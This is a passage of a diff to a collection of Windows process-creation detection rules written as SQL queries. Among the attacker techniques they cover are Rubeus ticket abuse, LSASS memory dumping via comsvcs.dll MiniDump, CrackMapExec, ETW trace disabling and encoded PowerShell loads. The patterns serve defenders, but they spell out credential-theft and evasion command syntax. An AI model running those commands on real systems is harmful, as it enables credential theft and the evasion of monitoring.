\"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "status": "experimental", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Very unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' 